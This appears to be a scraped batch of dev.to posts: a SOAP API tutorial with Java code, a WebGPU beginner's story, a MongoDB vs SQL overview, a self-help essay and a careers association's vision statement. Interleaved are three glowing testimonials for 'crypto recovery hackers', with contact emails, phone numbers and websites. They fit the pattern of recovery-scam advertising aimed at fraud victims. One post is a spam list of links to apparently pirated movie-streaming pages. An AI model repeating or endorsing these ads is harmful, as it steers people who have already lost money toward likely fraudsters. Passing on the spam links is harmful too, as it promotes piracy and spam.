It is done now, the app is wired to a static configuration json file without any changes to consumers and no extra dependency injection. Just some ts/js magic. Now we can modify configuration after building the app, without having to rebuilt it. Something quite useful when you do not know where you deploy beforehand.
Build once, run anywhere, eh? :)
P.S. the [poc repo](https://github.com/Bwca/demo_runtime-environment-config-in-angular-but-without-dependency-injection). | bwca |
1,881,593 | HIRE A PROFESSIONAL RECOVERY EXPERT | Reach out to Adrian Lamo Hacker via email: Adrianlamo@consultant.com Website:... | 0 | 2024-06-08T22:10:09 | https://dev.to/jaycie_ann_6a5eaeb5cf7db9/hire-a-professional-recovery-expert-19c3 | Reach out to Adrian Lamo Hacker via email: Adrianlamo@consultant.com
Website: https://adrianlamohackpro.online/
In the burgeoning landscape of cryptocurrency in 2023, I unwittingly embarked on a journey into the digital realm with a seemingly innocuous crypto wallet. Its allure of convenience and practicality ensnared me, but like a flickering flame, my interest waned, leaving the wallet to languish in the recesses of my memory. At the time, my knowledge of cryptocurrency was rudimentary, and the seemingly straightforward request for a key seemed unremarkable. Time, as it often does, marched relentlessly forward. It wasn't until recently, while navigating the boundless expanse of the internet, that I stumbled upon a digital oasis where individuals shared similar tales of lost wallets. It was there, amidst the shared experiences and camaraderie of the online community, that I discovered Adrian Lamo Hacker – a beacon of hope amidst the digital wilderness. Their name resonated with a promise of restoration and redemption, and with a surge of optimism, I reached out to them. The wallet, a relic of my past, held a forgotten fortune, a treasure I had long since relinquished. Little did I know that I had amassed a significant fortune in Bitcoin, a dormant wealth that lay hidden within the digital ether. Adrian Lamo Hacker, with their unparalleled expertise and unwavering commitment to digital justice, became my digital savior. Their adeptness in traversing the labyrinthine corridors of blockchain technology was evident, and they navigated the recovery process with unparalleled skill and finesse. They not only recovered my lost wallet but also provided a profound education on the intricacies of digital security, empowering me to navigate the digital world with a newfound sense of awareness. Their dedication to safeguarding digital assets and combating cybercrime is commendable. They are more than just a recovery agency; they are pioneers in the realm of digital restoration, champions of the lost and forgotten. I am eternally grateful for their assistance, their expertise, and their commitment to justice. Without their intervention, my lost Bitcoin wallet would have remained a phantom, a forgotten treasure buried in the depths of the digital abyss. It is with unwavering conviction that I recommend Adrian Lamo Hacker to anyone who has encountered the misfortune of a lost digital asset. They are the embodiment of hope in a digital world where security is paramount. They are the guardians of our digital fortunes, ensuring that our hard-earned wealth is not lost to the shadowy corners of the internet. | jaycie_ann_6a5eaeb5cf7db9 | |
1,881,590 | Why you need to sell yourself | “Your most important sale in life is to sell yourself to yourself.” Maxwell Maltz There is an... | 0 | 2024-06-08T22:03:52 | https://dev.to/arjunrao87/why-you-need-to-sell-yourself-48jg | beginners, productivity, learning, career | > “Your most important sale in life is to sell yourself to yourself.”
> - Maxwell Maltz
There is an unequivocal harsh truth in this world : nobody looks out for yourself better than you.
Sometimes you might wonder how certain people seemingly attain success “without doing any work”. There are times when I would — and I know YOU would — say something to the effect of “How did that person achieve success while I am not able to?”. Tell me with complete honesty, or better yet, admit to yourself that this thought hasn’t crossed your mind at least once before.
The true reason behind their success is that they were able to sell themselves better — period. And sure, they likely had a good product/idea/solution, but they coupled it with being able to craft the right narrative. They were better at stating why they were better than the rest of the arcade they were competing with. The reality of them being better or inferior compared to others is inconsequential for the purpose of this argument. They were better salesmen/women and marketers, and there are no two ways about that. The fact that they were able to convince the audience that they were better is all that matters.
The audience could be anyone you can think of. If you work in a company with your other colleagues, the audience could be the higher ups or peers in your company. In the open source technology space, it’s how loud your voice is and how successfully you can convince others of your idea. It is not always necessarily the merits of the actual idea you have worked on that matters but how you present that idea to the world. If you work in a startup, the audience could be the venture capital firms that you are wooing to get your funding from. If you are a board member of a company, it’s the shareholders that you want to placate or attract. The list goes on and on and on….
The biggest problem most people have when it comes to the notion of being successful is the act of selling yourself. Everyone fantasizes about the glory of success in a romanticized way, imagining how hard work, blood, sweat and tears lead to a hard-earned victory. However, most people shy away from actively selling themselves because they think of it as dirty or being untrue to the art/craft that they have dedicated their lives to. They think that it is tangential to the goal of making the world a better place. More often than not, it is also the self doubt that prevents them from selling themselves because they think that they are just not good enough or that selling themselves is a travesty. They think that if they sell themselves, they are overdoing it, and that there are much more qualified people out there doing what they are doing.
This is where I disagree. The fact that you doubt yourself is an indication of your superior thinking. Not only have you worked on your idea and achieved a modicum of success ( maybe it’s a LOT more, but I’m being conservative ), but you also have the emotional intelligence and awareness that puts you in a higher quartile. Perhaps you built a great product or a great company or possess a skill that you are really proud of, but unless you make people believe in your idea or creation, why should they be incentivized to have anything to do with it?! Display confidence, not hesitation. Confidence attracts attention. Confidence does not imply brashness. Projecting soft power can be incredibly useful and applied to the same effect as a bombastic display of showmanship.
The most successful people made it big because they knew what they were good at, and they knew how to make the world know about it. Think of Steve Jobs, Elon Musk, Indra Nooyi, Gordon Ramsay, Oprah Winfrey, and so forth. They were vocal about what they were doing and have perfected the craft of delivering the message of encompassing who they are. Is the playbook for someone else the road to your success? Probably not. Should you follow what everyone else does to the T to sell yourself? Certainly not.
The world is not a playground of zero-sum games with perfectly scripted mathematical equations; someone else’s success does not mean you have to take a backseat. You should not have to sit back and lurk in the shadows while someone is out there hustling. How can you sell a product, an idea, or a thought, if, as a first step, you are not able to state unequivocally what is special about yourself? There is a common saying: “If you don’t ask, you won’t get”. I would like to add to that: “If you don’t sell, they won’t buy”. The road might be long and hard and it might not be easy, but if you don’t take that first step, you are preventing yourself from even having a shot at this.
Don’t shy away. Don’t hide in the corner. Don’t be afraid of being in the spotlight. Don’t be doubtful of your achievements. Right before military units are about to undertake an operation, they use a phrase akin to “Breach, breach, breach”. While you embark on your operation to sell yourself, your call to action should be “Hustle, hustle, hustle”. Put in the effort! SELL yourself. Don’t sell yourself short; REALLY sell yourself. Carpe diem — seize the day! Make sure the world knows what you did. Make sure YOU tell the world what you did, because the fact of the matter is, if you don’t, no one else will.
| arjunrao87 |
1,881,589 | ydsyr7ew6r7uyuyiurrewr | https://gaming.lenovo.com/emea/threads/29305-WATCH-%E2%80%94-The-Garfield-Movie-2024-(-FulLMovie-)-Fr... | 0 | 2024-06-08T22:00:55 | https://dev.to/turuk_celek/ydsyr7ew6r7uyuyiurrewr-53e8 | https://gaming.lenovo.com/emea/threads/29305-WATCH-%E2%80%94-The-Garfield-Movie-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29308-WATCH-full%E2%80%94-The-Garfield-Movie-(2024)-(-FulLMovie-)-Online-On-Streamings
https://gaming.lenovo.com/emea/threads/29313-%E4%B9%9D%E9%BE%99%E5%9F%8E%E5%AF%A8%E4%B9%8B%E5%9B%B4%E5%9F%8E-2024-%E5%AE%8C%E6%95%B4%E7%89%88-1080P-HD-%E9%AB%98%E6%B8%85%E7%94%B5%E5%BD%B1
https://gaming.lenovo.com/emea/threads/29316-HAIKYU!!-The-Dumpster-Battle-(2024)-FullMovie-Download-Free-1080p-720p-480p-HD-HINDI-Dubbed
https://gaming.lenovo.com/emea/threads/29319-HAIKYU!!-The-Dumpster-Battle-(2024)-FULLMovie-Download-Free-720p-480p-1080p-HD
https://gaming.lenovo.com/emea/threads/29321-Watch%E2%80%94-HAIKYU!!-The-Dumpster-Battle-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29324-WATCH-%E2%80%94-HAIKYU!!-The-Dumpster-Battle-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29326-WATCH-%E2%80%94-Kingdom-of-the-Planet-of-the-Apes-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29330-WATCH-full%E2%80%94-Kingdom-of-the-Planet-of-the-Apes-(2024)-(-FulLMovie-)-Online-On-Streamings
https://gaming.lenovo.com/emea/threads/29333-WATCH-%EF%BD%9E-Kingdom-of-the-Planet-of-the-Apes-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29410-WATCH-%E2%80%94-Furiosa-A-Mad-Max-Saga-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29418-WATCH-%E2%80%94-The-Fall-Guy-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29452-WATCH-%E2%80%94-Challengers-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29586-WATCH-%E2%80%94-Bad-Boys-Ride-or-Die-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29597-WATCH-%EF%BD%9E-Bad-Boys-Ride-or-Die-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29481-PELISPLUS!!Furiosa-De-la-saga-Mad-Max-Pel%C3%ADcula-Completa-online-Gratis
https://gaming.lenovo.com/emea/threads/29619-WATCH-%E2%80%94-Bad-Boys-Ride-or-Die-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29623-WATCH-%EF%BD%9E-Bad-Boys-Ride-or-Die-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29629-WATCH-%EF%BD%9E-The-Strangers-Chapter-1-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29630-WATCH-%E2%80%94-The-Strangers-Chapter-1-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29640-WATCH-%E2%80%94-Jesus-Thirsts-The-Miracle-of-the-Eucharist-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29644-WATCH-%E2%80%94-Godzilla-x-Kong-The-New-Empire-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29657-WATCH-%E2%80%94-Sight-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29661-WATCH-%E2%80%94-In-a-Violent-Nature-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29667-WATCH-%E2%80%94-Venom-The-Last-Dance-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29672-WATCH-%EF%BD%9E-Venom-The-Last-Dance-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29682-WATCH-%E2%80%94-Auron-Mein-Kahan-Dum-Tha-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29686-WATCH-%EF%BD%9E-Auron-Mein-Kahan-Dum-Tha-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29692-WATCH-%E2%80%94-MUNJYA-2024-(-FulLMovie-)-Free-Online-on-English
https://gaming.lenovo.com/emea/threads/29776-%EC%9D%B8%EC%82%AC%EC%9D%B4%EB%93%9C-%EC%95%84%EC%9B%83-2-(-2024-%EA%B3%A0%ED%99%94%EC%A7%88-)-%ED%92%80%EB%B2%84%EC%A0%BC-Inside-Out-2%EB%B3%B4%EA%B8%B0
https://gaming.lenovo.com/emea/threads/29780-%EC%9B%90%EB%8D%94%EB%9E%9C%EB%93%9C-(-2024-%EA%B3%A0%ED%99%94%EC%A7%88-)-%ED%92%80%EB%B2%84%EC%A0%BC-WONDERLAND%EB%B3%B4%EA%B8%B0
https://www.bitsdujour.com/profiles/M1C9ON
https://forum.tecnocraft.net/threads/https-gaming-lenovo-com-emea-threads-29305-watch-e2-80-94-the-garfield-movie-2024-fullmovie-f.76461/
https://plaza.rakuten.co.jp/lasunmoive/diary/202406090000/
https://www.forexagone.com/forum/questions-debutants/yfuydufshdjfhsfkjsfd54354tetre54eresrs-122248
https://lifeisfeudal.com/Discussions/question/ftrdt65e6tdtserewresr
https://www.bankier.pl/forum/temat_uydskjshjhe6r876wyfuewyriuywiur,66726723.html
https://pastelink.net/7zyow3yv
https://paiza.io/projects/JdTKQVOxtRV3u4Y6aP-ORw
https://www.wowace.com/paste/da07affd
https://rift.curseforge.com/paste/5b7e5b86
https://dev.bukkit.org/paste/30625e95
https://authors-old.curseforge.com/paste/44d912c1
https://wow.curseforge.com/paste/c1df801d
https://hackmd.io/s/HJqMZ8MBC
https://paste.ee/p/BTGLI
https://snippet.host/cwdhzr
https://telegra.ph/udyf78f8eryfufyiureeefdsf-06-08
https://wokwi.com/projects/400162213119460353
https://pastebin.com/6wU4pthk
https://yamcode.com/djsfusoifds8f7fuewoiur
https://jsbin.com/canoxoquwo/edit?html,output | turuk_celek | |
1,881,588 | Understanding SOAP APIs and Their Usage | In the world of web services, APIs (Application Programming Interfaces) play a crucial role in... | 0 | 2024-06-08T21:53:37 | https://dev.to/ayas_tech_2b0560ee159e661/understanding-soap-apis-and-their-usage-2mak |
In the world of web services, APIs (Application Programming Interfaces) play a crucial role in enabling communication between different software systems. One of the older, yet still widely used, protocols for creating APIs is SOAP (Simple Object Access Protocol). This blog will delve into what SOAP APIs are, how they are used, and their key features.
**What is a SOAP API?**
SOAP (Simple Object Access Protocol) is a protocol for exchanging structured information in the implementation of web services. SOAP uses XML (Extensible Markup Language) for its message format and relies on other application layer protocols, such as HTTP or SMTP, for message negotiation and transmission.
SOAP APIs are known for their robustness and the ability to operate over any protocol, making them a preferred choice for enterprise-level applications that require a high level of security and transactional reliability.
**Key Features of SOAP APIs**
Protocol Independence: SOAP can be used over various protocols such as HTTP, SMTP, TCP, and more. This flexibility allows it to be used in diverse environments.
Language and Platform Neutral: SOAP APIs are not tied to any specific programming language or platform. They use XML, which is a universally recognized data format, ensuring interoperability between different systems.
Standards Compliance: SOAP adheres to various standards defined by the World Wide Web Consortium (W3C). These standards ensure that SOAP implementations are consistent and compatible across different platforms.
Extensibility: SOAP is highly extensible and allows for custom features and functionalities through SOAP headers.
Security: SOAP supports various security protocols and standards such as WS-Security, making it suitable for applications that require secure communications.
**Structure of a SOAP Message
A SOAP message is composed of the following parts:**
Envelope: The root element that defines the start and end of the message. It encapsulates the entire SOAP message.
Header: An optional element that contains application-specific information like authentication, transaction management, and message routing.
Body: The main part of the SOAP message that contains the actual data or request information. It must be present in every SOAP message.
Fault: An optional element within the Body that provides error information if the SOAP message processing fails.
Here’s a simple example of a SOAP message:
```
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
</soap:Header>
<soap:Body>
<m:GetPrice xmlns:m="https://www.example.org/stock">
<m:StockName>IBM</m:StockName>
</m:GetPrice>
</soap:Body>
</soap:Envelope>
```
**How SOAP APIs are Used**
**1. Web Services Integration**
SOAP APIs are commonly used in enterprise environments for integrating web services. For example, a SOAP API might be used to integrate a company's internal CRM system with a third-party email marketing service.
**2. Legacy Systems**
Many older systems and applications were built using SOAP, and these systems continue to operate reliably today. SOAP APIs are often used to connect with these legacy systems without requiring significant changes to the existing infrastructure.
**3. High-Security Applications**
SOAP's robust security features make it a suitable choice for applications that require a high level of security, such as financial services, healthcare, and government systems. SOAP supports WS-Security, which provides end-to-end security.
**4. Asynchronous Processing and Polling**
SOAP APIs can handle asynchronous processing and polling through the use of message queues and other mechanisms. This is beneficial for applications that require reliable message delivery and processing over time.
Implementing a SOAP API
To implement a SOAP API, you generally need to follow these steps:
Define the WSDL (Web Services Description Language): WSDL is an XML-based language used to describe the services, operations, and messages that the SOAP API provides. It acts as a contract between the service provider and the consumer.
Create the Service Endpoint: Develop the service that will process the SOAP requests. This can be done using various programming languages and frameworks that support SOAP, such as Java (with JAX-WS), .NET, or Python (with Zeep).
Deploy the Service: Host the SOAP service on a server that can accept and process SOAP messages, typically over HTTP or HTTPS.
Consume the Service: Clients can consume the SOAP service by generating client code from the WSDL file and sending SOAP requests to the service endpoint.
Example: Creating a Simple SOAP Service in Java
Here’s a basic example of creating a SOAP web service in Java using JAX-WS:
**1. Define the Service Interface:**
```
import javax.jws.WebService;
import javax.jws.WebMethod;
@WebService
public class StockService {
@WebMethod
public float getPrice(String stockSymbol) {
// Implementation logic
return 100.0f; // Sample response
}
}
```
**2. Publish the Service:**
```
import javax.xml.ws.Endpoint;
public class ServicePublisher {
public static void main(String[] args) {
Endpoint.publish("http://localhost:8080/StockService", new StockService());
System.out.println("Service is published!");
}
}
```
**3. Consume the Service (Client Code):**
```
import javax.xml.namespace.QName;
import javax.xml.ws.Service;
import java.net.URL;
public class StockClient {
public static void main(String[] args) throws Exception {
URL url = new URL("http://localhost:8080/StockService?wsdl");
QName qname = new QName("http://service.example.com/", "StockService");
Service service = Service.create(url, qname);
StockService stockService = service.getPort(StockService.class);
System.out.println("Price: " + stockService.getPrice("IBM"));
}
}
```
**Conclusion**
SOAP APIs are a reliable and robust way to enable communication between different software systems, especially in enterprise environments. Despite the rise of RESTful APIs, SOAP remains relevant for applications that require high security, transaction management, and support for complex operations. By understanding the structure, implementation, and use cases of SOAP APIs, you can better appreciate their role in modern web services and leverage them effectively in your projects.
| ayas_tech_2b0560ee159e661 | |
1,881,587 | TRUSTED CRYPTO CURRENCY RECOVERY EXPERT//FOLKWIN EXPERT RECOVERY. | The sting of betrayal is a cruel mistress. It can leave you reeling, questioning your judgment, and... | 0 | 2024-06-08T21:48:31 | https://dev.to/ford_hazard_ed90d7daafd5e/trusted-crypto-currency-recovery-expertfolkwin-expert-recovery-4elj |

The sting of betrayal is a cruel mistress. It can leave you reeling, questioning your judgment, and feeling utterly vulnerable. This is precisely how I felt when I fell victim to a binary trading scam. The promise of lucrative returns, and a comfortable retirement, all those dreams I had meticulously built for decades crumbled under the weight of deceit. I had entrusted my hard-earned savings to a company that promised the moon, only to find myself in a desolate wasteland of broken promises and financial ruin. The company, a viper disguised in a suit of legitimacy, vanished into thin air, leaving me with nothing but shattered dreams and a hefty debt. The betrayal cut deep, a wound that festered with anger and despair. I sought solace in the digital world, hoping to find a path to recovery. I immersed myself in forums and online communities, searching for a solution, a glimmer of hope in the abyss of my despair. My research led me to countless tales of woe, stories that echoed my pain. But amidst the despair, a beacon of hope emerged – Folkwin Expert Recovery. They were a lifeline, a beacon of light in the darkness. They understood my pain, my anguish, and my desperation. Their approach was compassionate and understanding, a stark contrast to the cold indifference I had encountered from the scammers. Folkwin Expert Recovery didn't sugarcoat the process. They laid out the challenges, the complexities of recovering funds from fraudulent online ventures. But their expertise, their unwavering determination, and their transparency instilled in me a sense of trust that I had lost long ago. I placed my faith in their hands, clinging to the hope they offered. The wait was agonizing, each passing day stretching into an eternity. But then, the email arrived – a beacon of light in my digital inbox. Folkwin Expert Recovery had succeeded in recovering a significant portion of my stolen funds. It wasn't a complete victory, but it was a resounding triumph against the forces of deceit. My experience has left me with a profound respect for Folkwin Expert Recovery. They are not merely a recovery agency; they are a force for good in a digital world fraught with deception. They embody the spirit of justice, fighting against the forces of greed and corruption. I urge anyone who has been ensnared by online scams, anyone who has suffered the pain of betrayal, to reach out to Folkwin Expert Recovery. They are a lifeline, a beacon of hope, and they offer a fighting chance at reclaiming what has been stolen. In a world where trust is often elusive, Folkwin Expert Recovery stands as a testament to the power of integrity and compassion. They are the digital sheriffs, battling against the shadows that lurk in the corners of the online world. My experience with them has restored my faith in humanity, reminding me that there are still individuals who fight for justice, and who seek to right the wrongs of the digital age. For help, contact them via Email//: ( Folkwinexpertrecovery AT tech-center DOT com ) , ( Website//: www.folkwinexpertrecovery.com ) , Whatsapp//: ( +1 (740)705-0711 ) ...
Best wishes,
Ford Hazard. | ford_hazard_ed90d7daafd5e | |
1,881,254 | HOW TO RECOVER STOLEN ETHEREUM | I was once a victim of a heart-wrenching cryptocurrency scam that left me devastated. I had invested... | 0 | 2024-06-08T09:42:30 | https://dev.to/matthew_ahanu_8a643a1ea64/how-to-recover-stolen-ethereum-20nk | I was once a victim of a heart-wrenching cryptocurrency scam that left me devastated. I had invested a significant sum of $195,000 worth of Ethereum in an online investment platform, hoping to reap substantial profits. Little did I know that I was about to face a nightmare. As the weeks went by, my excitement turned into despair when I realized that the platform I had trusted was nothing more than an elaborate scheme to rob unsuspecting investors like me my hard-earned Ethereum, leaving me feeling helpless and betrayed. After extensive research, I came across Century Hackers Recovery Team, a crypto recovery specialist who helps victims like me regain their stolen assets. After weeks of tireless efforts, (century@cyberservices.com ) had successfully recovered a substantial portion of my lost Ethereum. To anyone who finds themselves in a similar unfortunate situation, I urge you not to lose hope. Reach out to Century Team for your Crypto recovery. via century@cyberservices.com website: https://centurycyberhacker.pro WhatsApp +31 (622) 673-038 | matthew_ahanu_8a643a1ea64 | |
1,881,586 | ASOCIATIA OPORTUNITATI SI CARIERE - viziune | Viziunea Asociației Oportunități și Cariere se proiectează pe ideea că fiecare individ, indiferent de... | 0 | 2024-06-08T21:39:37 | https://dev.to/sebiboga/asociatia-oportunitati-si-cariere-viziune-2lal | oportunitatisicariere, peviitor, cariera | **Viziunea** Asociației Oportunități și Cariere se proiectează pe ideea că fiecare individ, indiferent de vârstă, pregătire sau experiență, are dreptul la oportunități egale de dezvoltare profesională. Considerăm că munca nu este doar o necesitate sau o obligație, ci un mijloc prin care fiecare persoană își poate pune în valoare talentul, creativitatea și pasiunea.
Așadar, aspirăm la o lume în care obținerea unui loc de muncă valoros și potrivit fiecărui individ să nu fie îngreunată de inaccesibilitatea informațiilor sau de lipsa unei platforme centrale unde să fie agregate toate oportunitățile disponibile.
Susținând includerea și egalitatea șanselor, dorim să implementăm și să îmbunătățim continuu platforma https://peviitor.ro, astfel încât aceasta să devină locul ideal pentru toți cei care sunt în căutare de oportunități profesionale. Dorim ca utilizatorii noștri să fie întotdeauna la curent cu joburile disponibile în real time, să își poată compara opțiunile și să aleagă cea mai bună pentru ei.
Într-o lume în continuă schimbare, în care competitivitatea pe piața muncii este tot mai accentuată, ne propunem să ajutăm fiecare utilizator să își maximizeze potențialul și să își atingă aspirațiile profesionale.
Astfel, **viziunea** noastră se bazează pe promovarea accesului egal la informații de calitate despre piața muncii și pe creșterea nivelului de informare și consiliere a celor în căutare de oportunități profesionale. Ne străduim să contribuim la crearea unui mediu de lucru inclusiv și dinamic, marcat prin transparență, eficiență și respect pentru valoarea fiecărui individ în parte.
Înțelegem că în domeniul carierei, accesibilitatea și disponibilitatea informațiilor este esențială. Pentru a face față acestei provocări, intenționăm să extindem și să dezvoltăm platforma https://peviitor.ro într-un hub central pentru toate oportunitățile de carieră din România.
În ceea ce privește viziunea noastră pe termen lung, vedem ASOCIATIA OPORTUNITATI SI CARIERE ca un catalizator pentru schimbare și progres în lumea profesională. Ne străduim să dinamizăm piața muncii și să punem la dispoziție resurse și instrumente accesibile pentru toți cei interesați să își îmbunătățească cariera sau care sunt în căutarea primului loc de muncă.
În plus, ne propunem să promovăm o cultură a muncii ce pune accent pe valoarea fiecărui individ, pe diversitate și pe valorificarea potențialului unic al fiecăruia. Dorim să construim un mediu în care fiecare om să se simtă valorat, respectat și motivat să își atingă aspirațiile.
În final, **viziunea** noastră implică crearea unui viitor în care fiecare individ are ocazia să își realizeze adevăratul potențial. Credem în forța educației și a informației, și în puterea lor de a forma cariere de succes și vieți împlinite. Prin platforma noastră, vom sprijini și vom inspira nenumărate potențiale cariere, și astfel, vom contribui la un viitor mai bun pentru toți.
Viziunea noastră se îmbogățește prin faptul că acționăm nu doar ca un simplu punct de întâlnire între angajatori și potențiali angajați, ci avem în inima noastră misiunea de a servi drept catalizator pentru evoluție, învățare și redefinire a carierei.
Ne mândrim cu diversitatea vârstelor și experiențelor din rândul voluntarilor și colaboratorilor noștri, fie că sunt tineri la început de drum, adulți în căutarea unei schimbări sau persoane mature doritoare să adopte o nouă carieră. Valorizăm fiecare etapă a dezvoltării profesionale și susținem importanța continuării învățării și transformării, indiferent de vârstă sau experiență.
În plus, avem nenumărate exemple ale succesului redefinirii de carieră - fie că este vorba de casieri deveniți dezvoltatori IT sau barista deveniți testeri. Acestea demonstrează beneficiul și efectul pozitiv al investiției în dezvoltarea personală și profesională.
Prin urmare, în **viziunea** noastră, https://peviitor.ro nu este doar o platformă de căutare a locurilor de muncă, ci un sprijin real pentru toți cei care doresc să facă o schimbare în viața lor profesională. Dorim să creăm un mediu care stimulează creșterea și dezvoltarea, unde fiecare persoană este încurajată să își depășească limitele, să își transforme visurile în realitate și să fie mândră de ceea ce a realizat. | sebiboga |
1,881,584 | A Beginner's Journey into Graphics Programming | One fateful night, I was scrolling through my YouTube feed when I came across an interesting... | 0 | 2024-06-08T21:34:08 | https://giftmugweni.hashnode.dev/a-beginners-journey-into-graphics-programming | webgpu, graphics, webdev | One fateful night, I was scrolling through my YouTube feed when I came across an interesting [Kishimisu channel video](https://www.youtube.com/watch?v=f4s1h2YETNY&t=2s&ab_channel=kishimisu) introducing me to the wild world of graphics programming. In the video, I saw a beautiful visual created with nothing but mathematical concepts and I got hooked. Here I was, lamenting my horrible hand-eye coordination and thinking I was doomed in art when I could have put all those years of learning linear algebra and calculus to good use. Here was an excuse to use maths for entertainment that I could get behind. So, I decided to see what happens in this strange world of drawing stuff on the screen.
To start my exploration, I thought it'd be great if I could reproduce the visual I saw in the Kishimisu video. In the video I watched, he made the visual on this amazing website called [Shadertoy](https://www.shadertoy.com/) where a bunch of incredibly smart people make visualizations and share the code on how they made them. For reference, these are some of the visuals on the site that blew me away.
{% embed https://www.shadertoy.com/view/Wt33Wf %}
{% embed https://www.shadertoy.com/view/XfyXRV %}
{% embed https://www.shadertoy.com/view/4XVGWh %}
{% embed https://www.shadertoy.com/view/DsBczR %}
Now, you'd think that since I wanted to reproduce the visual I'd create a Shadertoy account and start coding away right? Well, that was my plan at the beginning. As I was in the process of staring at those visuals, I found myself wondering how the Shadertoy website worked. As such, I found myself entering much deeper waters.
From my research, I learnt about the magic of shaders. Now, what are shaders? As far as I understood, shaders are just programs that run on your graphics card which is one of the key gadgets that allows you to play all the new amazing games these days. Like any programming language, shaders can be written in various languages like OpenGL, DirectX, Vulkan or Metal. However, strangely enough, when it comes to websites, there seems to be only one language at its core which is called WebGL which is just a port of OpenGL.
In a wild twist of fate, as I was learning about WebGL, I learned that a new graphics API was released last year called [WebGPU](https://developer.chrome.com/blog/webgpu-io2023/) that is meant to succeed WebGL considering it was initially released in the early 2010s. This felt amazing as that means we are possibly at the cusp of a graphics revolution for the web. This means I can get an opportunity to experience a potentially new world-shaking technology regarding computer visuals on the web in real-time and experience the technology evolve with me.
So, I instantly pivoted and started to see if I could reproduce the initial visual not in WebGL on Shadertoy but in WebGPU using my hacky code. Below are some visuals I made using WebGPU.



{% embed https://youtu.be/F-1kVqEKe74 %}
{% embed https://youtu.be/TD7LubmvQSE %}
{% embed https://youtu.be/OdHmCuwKgVY %}
{% embed https://youtu.be/qhxbtAdrD1U %}
Having played around with the new API I have to say I was greatly impressed so, I decided to make this a series where I talk about my learnings in graphics programming and hopefully I get to show you all more and more amazing visuals and also explanations of my learnings as I go on. | gift_mugweni_1c055b418706 |
1,881,570 | Understanding MongoDB and Its Differences from SQL Databases | In the world of databases, SQL and NoSQL represent two distinct paradigms. While SQL databases have... | 0 | 2024-06-08T21:30:07 | https://dev.to/ayas_tech_2b0560ee159e661/understanding-mongodb-and-its-differences-from-sql-databases-7h6 | In the world of databases, SQL and NoSQL represent two distinct paradigms. While SQL databases have been the backbone of enterprise applications for decades, NoSQL databases like MongoDB have gained significant traction due to their flexibility and scalability. This blog will explore MongoDB's use cases and highlight the key differences between MongoDB and SQL databases.
**What is MongoDB?**
MongoDB is a NoSQL database designed for storing, retrieving, and managing document-oriented information. Instead of using tables and rows as in traditional SQL databases, MongoDB uses collections and documents. A document is a set of key-value pairs, similar to JSON objects. This structure allows MongoDB to handle complex data types and hierarchical relationships more naturally.
**Key Features of MongoDB**
Schema Flexibility: Unlike SQL databases, MongoDB does not enforce a rigid schema, allowing you to store different types of data in the same collection. This flexibility is particularly useful for applications where data requirements change frequently.
**Scalability:** MongoDB is designed to scale horizontally, making it easier to distribute data across multiple servers. This feature is essential for handling large volumes of data and high-traffic applications.
High Performance: MongoDB can handle high-throughput and low-latency operations, making it suitable for real-time applications. Its in-memory storage engine and indexing capabilities contribute to its performance.
Rich Query Language: MongoDB provides a powerful query language that supports ad-hoc queries, indexing, and aggregation. This allows developers to perform complex queries and data manipulations efficiently.
**How MongoDB Differs from SQL Databases
Data Model**
**SQL:** SQL databases use a structured data model with tables, rows, and columns. The schema must be defined before data can be inserted, and altering the schema often requires significant effort.
MongoDB: MongoDB uses a flexible document model with collections and documents. Each document can have a different structure, allowing for a more dynamic and adaptable data model.
Schema Design
**SQL:** In SQL databases, the schema is strictly defined and enforced. This ensures data integrity and consistency but can be limiting when dealing with evolving data requirements.
MongoDB: MongoDB allows for a flexible schema, enabling developers to store various types of data without predefined schemas. This is particularly useful for applications with changing data structures.
Scalability
**SQL:** SQL databases typically scale vertically by adding more resources to a single server. Horizontal scaling is possible but often complex.
**MongoDB:** MongoDB is designed for horizontal scaling, making it easier to distribute data across multiple servers and handle large-scale applications.
Transaction Management
**SQL:** SQL databases provide strong ACID (Atomicity, Consistency, Isolation, Durability) properties, ensuring reliable transaction management and data integrity.
**MongoDB:** While MongoDB also supports ACID transactions, especially with the introduction of multi-document transactions, it is generally more optimized for high availability and partition tolerance (as per the CAP theorem).
Query Language
**SQL:** SQL databases use Structured Query Language (SQL) for querying and managing data. SQL is a powerful and standardized language with a rich set of features.
**MongoDB:** MongoDB uses a JSON-like query language, which is more flexible and allows for complex queries and aggregations. It supports a wide range of operators and expressions to filter and manipulate data.
Use Cases for MongoDB
Content Management Systems (CMS): The flexibility of MongoDB makes it ideal for content management systems where data types and structures can vary widely.
Real-Time Analytics: MongoDB's high performance and scalability make it suitable for real-time analytics and big data applications.
Internet of Things (IoT): MongoDB can handle the diverse and dynamic data generated by IoT devices, making it a good choice for IoT applications.
E-Commerce: The ability to store different types of data, such as product information and user reviews, makes MongoDB a great fit for e-commerce platforms.
**Conclusion**
